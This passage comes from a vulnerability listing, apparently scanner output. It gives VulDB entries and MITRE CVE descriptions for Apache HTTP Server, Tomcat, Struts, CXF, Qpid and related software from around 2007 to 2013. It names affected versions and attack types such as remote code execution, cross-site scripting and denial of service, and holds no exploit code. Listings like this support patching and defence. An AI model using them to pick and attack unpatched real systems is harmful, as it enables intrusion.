5067| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
5068| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
5069| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
5070| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
5071| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
5072| [40234] Apache Tomcat up to 6.0.15 directory traversal
5073| [40221] Apache HTTP Server 2.2.6 information disclosure
5074| [40027] David Castro Apache Authcas 0.4 sql injection
5075| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
5076| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
5077| [3414] Apache Tomcat WebDAV Stored privilege escalation
5078| [39489] Apache Jakarta Slide up to 2.1 directory traversal
5079| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
5080| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
5081| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
5082| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
5083| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
5084| [38524] Apache Geronimo 2.0 unknown vulnerability
5085| [3256] Apache Tomcat up to 6.0.13 cross site scripting
5086| [38331] Apache Tomcat 4.1.24 information disclosure
5087| [38330] Apache Tomcat 4.1.24 information disclosure
5088| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
5089| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
5090| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
5091| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
5092| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
5093| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
5094| [37292] Apache Tomcat up to 5.5.1 cross site scripting
5095| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
5096| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
5097| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
5098| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
5099| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
5100| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
5101| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
5102| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
5103| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
5104| [36225] XAMPP Apache Distribution 1.6.0a sql injection
5105| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
5106| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
5107| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
5108| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
5109| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
5110| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
5111| [34252] Apache HTTP Server denial of service
5112| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
5113| [33877] Apache Opentaps 0.9.3 cross site scripting
5114| [33876] Apache Open For Business Project unknown vulnerability
5115| [33875] Apache Open For Business Project cross site scripting
5116| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
5117| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
5118|
5119| MITRE CVE - https://cve.mitre.org:
5120| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
5121| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
5122| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
5123| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
5124| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
5125| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
5126| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
5127| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
5128| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
5129| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
5130| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
5131| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
5132| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
5133| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
5134| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
5135| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
5136| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
5137| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
5138| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
5139| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
5140| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
5141| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
5142| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
5143| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
5144| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
5145| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
5146| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
5147| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
5148| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
5149| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
5150| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5151| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
5152| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
5153| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
5154| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
5155| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
5156| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
5157| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
5158| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
5159| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
5160| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
5161| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5162| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5163| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5164| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5165| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
5166| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
5167| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
5168| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
5169| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
5170| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
5171| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
5172| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
5173| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
5174| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
5175| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
5176| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
5177| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
5178| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
5179| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
5180| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
5181| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
5182| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
5183| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
5184| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5185| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
5186| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
5187| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
5188| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
5189| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
5190| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
5191| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
5192| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
5193| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
5194| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
5195| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
5196| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
5197| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
5198| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
5199| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
5200| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
5201| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
5202| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
5203| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
5204| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
5205| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
5206| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
5207| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
5208| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
5209| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
5210| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
5211| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
5212| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
5213| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
5214| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
5215| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
5216| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
5217| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
5218| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
5219| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
5220| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
5221| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
5222| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
5223| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
5224| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
5225| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
5226| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
5227| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
5228| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
5229| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
5230| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
